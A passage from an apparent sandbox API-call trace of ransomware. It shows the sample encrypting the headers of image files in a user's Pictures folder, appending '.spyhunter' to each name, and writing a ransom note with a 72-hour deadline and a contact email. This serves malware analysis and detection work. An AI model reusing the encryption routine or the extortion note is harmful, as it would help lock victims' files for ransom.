(HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.677] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qiDBt7HPNALY11.gif.spyhunter") returned 71 [0147.677] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qiDBt7HPNALY11.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qidbt7hpnaly11.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qiDBt7HPNALY11.gif.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qidbt7hpnaly11.gif.spyhunter")) returned 1 [0147.678] GetProcessHeap () returned 0x2c0000 [0147.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.678] GetProcessHeap () returned 0x2c0000 [0147.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.678] GetProcessHeap () returned 0x2c0000 [0147.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x302f4d0 | out: hHeap=0x2c0000) returned 1 [0147.678] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee68 | out: pbBuffer=0x57ee68) returned 1 [0147.678] GetProcessHeap () returned 0x2c0000 [0147.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.678] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee60*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee60*=0x30) returned 1 [0147.678] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LWIvl.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lwivl.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.679] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LWIvl.jpg") returned 52 [0147.679] StrStrW (lpFirst="LWIvl.jpg", lpSrch=".txt") returned 0x0 [0147.679] GetProcessHeap () returned 0x2c0000 [0147.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.679] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ee24, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ee24*=0x2800, lpOverlapped=0x0) returned 1 [0147.680] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.680] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ee24, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ee24*=0x2800, lpOverlapped=0x0) returned 1 [0147.680] GetProcessHeap () returned 0x2c0000 [0147.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.680] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.680] WriteFile (in: hFile=0xa0, lpBuffer=0x57ee64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ee24, lpOverlapped=0x0 | out: lpBuffer=0x57ee64*, lpNumberOfBytesWritten=0x57ee24*=0x4, lpOverlapped=0x0) returned 1 [0147.681] WriteFile (in: hFile=0xa0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ee24, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ee24*=0x30, lpOverlapped=0x0) returned 1 [0147.681] CloseHandle (hObject=0xa0) returned 1 [0147.681] GetProcessHeap () returned 0x2c0000 [0147.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.681] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LWIvl.jpg.spyhunter") returned 62 [0147.681] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LWIvl.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lwivl.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LWIvl.jpg.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lwivl.jpg.spyhunter")) returned 1 [0147.682] GetProcessHeap () returned 0x2c0000 [0147.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.682] GetProcessHeap () returned 0x2c0000 [0147.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.682] GetProcessHeap () returned 0x2c0000 [0147.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a2ab8 | out: hHeap=0x2c0000) returned 1 [0147.716] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee60 | out: pbBuffer=0x57ee60) returned 1 [0147.716] GetProcessHeap () returned 0x2c0000 [0147.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.716] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee58*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee58*=0x30) returned 1 [0147.716] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\-g6m.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l9wmcfw6rsf4c\\-g6m.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.716] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\-g6m.jpg") returned 65 [0147.716] StrStrW (lpFirst="-g6m.jpg", lpSrch=".txt") returned 0x0 [0147.716] GetProcessHeap () returned 0x2c0000 [0147.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0147.716] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ee1c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57ee1c*=0x2800, lpOverlapped=0x0) returned 1 [0147.717] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.717] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ee1c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57ee1c*=0x2800, lpOverlapped=0x0) returned 1 [0147.718] GetProcessHeap () returned 0x2c0000 [0147.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0147.718] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.718] WriteFile (in: hFile=0x178, lpBuffer=0x57ee5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ee1c, lpOverlapped=0x0 | out: lpBuffer=0x57ee5c*, lpNumberOfBytesWritten=0x57ee1c*=0x4, lpOverlapped=0x0) returned 1 [0147.718] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ee1c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ee1c*=0x30, lpOverlapped=0x0) returned 1 [0147.718] CloseHandle (hObject=0x178) returned 1 [0147.719] GetProcessHeap () returned 0x2c0000 [0147.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0147.720] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\-g6m.jpg.spyhunter") returned 75 [0147.720] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\-g6m.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l9wmcfw6rsf4c\\-g6m.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l9WmcfW6rsF4c\\-g6m.jpg.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l9wmcfw6rsf4c\\-g6m.jpg.spyhunter")) returned 1 [0147.723] GetProcessHeap () returned 0x2c0000 [0147.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0147.723] GetProcessHeap () returned 0x2c0000 [0147.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.723] GetProcessHeap () returned 0x2c0000 [0147.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef6528 | out: hHeap=0x2c0000) returned 1 [0147.723] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee60 | out: pbBuffer=0x57ee60) returned 1 [0147.723] GetProcessHeap () returned 0x2c0000 [0147.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.723] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee58*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee58*=0x30) returned 1 [0147.723] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L2XIAgXV.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l2xiagxv.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.724] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L2XIAgXV.png") returned 55 [0147.724] StrStrW (lpFirst="L2XIAgXV.png", lpSrch=".txt") returned 0x0 [0147.724] GetProcessHeap () returned 0x2c0000 [0147.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0147.724] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ee1c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57ee1c*=0x2800, lpOverlapped=0x0) returned 1 [0147.725] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.725] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ee1c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57ee1c*=0x2800, lpOverlapped=0x0) returned 1 [0147.725] GetProcessHeap () returned 0x2c0000 [0147.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0147.725] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.725] WriteFile (in: hFile=0x178, lpBuffer=0x57ee5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ee1c, lpOverlapped=0x0 | out: lpBuffer=0x57ee5c*, lpNumberOfBytesWritten=0x57ee1c*=0x4, lpOverlapped=0x0) returned 1 [0147.726] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ee1c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ee1c*=0x30, lpOverlapped=0x0) returned 1 [0147.726] CloseHandle (hObject=0x178) returned 1 [0147.726] GetProcessHeap () returned 0x2c0000 [0147.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0147.726] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L2XIAgXV.png.spyhunter") returned 65 [0147.726] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L2XIAgXV.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l2xiagxv.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L2XIAgXV.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l2xiagxv.png.spyhunter")) returned 1 [0147.727] GetProcessHeap () returned 0x2c0000 [0147.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0147.727] GetProcessHeap () returned 0x2c0000 [0147.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.727] GetProcessHeap () returned 0x2c0000 [0147.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a2a00 | out: hHeap=0x2c0000) returned 1 [0147.727] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee58 | out: pbBuffer=0x57ee58) returned 1 [0147.727] GetProcessHeap () returned 0x2c0000 [0147.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.727] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee50*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee50*=0x30) returned 1 [0147.727] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HskXwn2lcCk8zAXLk.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hskxwn2lcck8zaxlk.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.728] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HskXwn2lcCk8zAXLk.png") returned 64 [0147.728] StrStrW (lpFirst="HskXwn2lcCk8zAXLk.png", lpSrch=".txt") returned 0x0 [0147.728] GetProcessHeap () returned 0x2c0000 [0147.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0147.728] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ee14, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57ee14*=0x2800, lpOverlapped=0x0) returned 1 [0147.729] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.729] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ee14, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57ee14*=0x2800, lpOverlapped=0x0) returned 1 [0147.729] GetProcessHeap () returned 0x2c0000 [0147.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0147.729] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.729] WriteFile (in: hFile=0x178, lpBuffer=0x57ee54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ee14, lpOverlapped=0x0 | out: lpBuffer=0x57ee54*, lpNumberOfBytesWritten=0x57ee14*=0x4, lpOverlapped=0x0) returned 1 [0147.729] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ee14, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ee14*=0x30, lpOverlapped=0x0) returned 1 [0147.729] CloseHandle (hObject=0x178) returned 1 [0147.729] GetProcessHeap () returned 0x2c0000 [0147.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0147.730] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HskXwn2lcCk8zAXLk.png.spyhunter") returned 74 [0147.730] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HskXwn2lcCk8zAXLk.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hskxwn2lcck8zaxlk.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HskXwn2lcCk8zAXLk.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hskxwn2lcck8zaxlk.png.spyhunter")) returned 1 [0147.730] GetProcessHeap () returned 0x2c0000 [0147.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0147.730] GetProcessHeap () returned 0x2c0000 [0147.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.730] GetProcessHeap () returned 0x2c0000 [0147.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef6458 | out: hHeap=0x2c0000) returned 1 [0147.730] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee58 | out: pbBuffer=0x57ee58) returned 1 [0147.731] GetProcessHeap () returned 0x2c0000 [0147.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.731] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee50*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee50*=0x30) returned 1 [0147.731] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.731] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini") returned 54 [0147.731] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0147.731] GetProcessHeap () returned 0x2c0000 [0147.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0147.731] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ee14, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57ee14*=0x1f8, lpOverlapped=0x0) returned 1 [0147.732] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffe08, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.732] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x57ee14, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57ee14*=0x1f8, lpOverlapped=0x0) returned 1 [0147.732] GetProcessHeap () returned 0x2c0000 [0147.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0147.732] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.732] WriteFile (in: hFile=0x178, lpBuffer=0x57ee54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ee14, lpOverlapped=0x0 | out: lpBuffer=0x57ee54*, lpNumberOfBytesWritten=0x57ee14*=0x4, lpOverlapped=0x0) returned 1 [0147.732] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ee14, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ee14*=0x30, lpOverlapped=0x0) returned 1 [0147.732] CloseHandle (hObject=0x178) returned 1 [0147.732] GetProcessHeap () returned 0x2c0000 [0147.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0147.733] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini.spyhunter") returned 64 [0147.733] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini.spyhunter")) returned 1 [0147.733] GetProcessHeap () returned 0x2c0000 [0147.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0147.733] GetProcessHeap () returned 0x2c0000 [0147.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.733] GetProcessHeap () returned 0x2c0000 [0147.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a2948 | out: hHeap=0x2c0000) returned 1 [0147.734] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.734] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.734] WriteFile (in: hFile=0x178, lpBuffer=0x57ed87*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57eeb0, lpOverlapped=0x0 | out: lpBuffer=0x57ed87*, lpNumberOfBytesWritten=0x57eeb0*=0x127, lpOverlapped=0x0) returned 1 [0147.735] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.735] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57eeb0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57eeb0*=0x2ac, lpOverlapped=0x0) returned 1 [0147.735] CloseHandle (hObject=0x178) returned 1 [0147.735] GetProcessHeap () returned 0x2c0000 [0147.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c82038 | out: hHeap=0x2c0000) returned 1 [0147.735] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee50 | out: pbBuffer=0x57ee50) returned 1 [0147.735] GetProcessHeap () returned 0x2c0000 [0147.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.735] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee48*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee48*=0x30) returned 1 [0147.735] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\oFiWDltzZK.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\ofiwdltzzk.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.736] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\oFiWDltzZK.bmp") returned 69 [0147.736] StrStrW (lpFirst="oFiWDltzZK.bmp", lpSrch=".txt") returned 0x0 [0147.736] GetProcessHeap () returned 0x2c0000 [0147.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0147.736] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ee0c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57ee0c*=0x2800, lpOverlapped=0x0) returned 1 [0147.737] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, 